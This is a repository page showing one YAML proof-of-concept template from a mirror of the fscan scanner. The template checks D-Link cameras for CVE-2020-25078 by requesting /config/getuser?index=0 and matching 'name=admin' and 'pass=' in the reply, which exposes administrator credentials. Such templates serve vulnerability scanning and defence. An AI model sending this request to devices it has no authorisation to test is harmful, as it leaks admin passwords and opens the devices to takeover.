qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/dlink-cve-2020-25078-accoun...

14 lines
452 B
YAML
Raw Blame History

name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
- method: GET
path: >-
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
Reference in New Issue View Git Blame Copy Permalink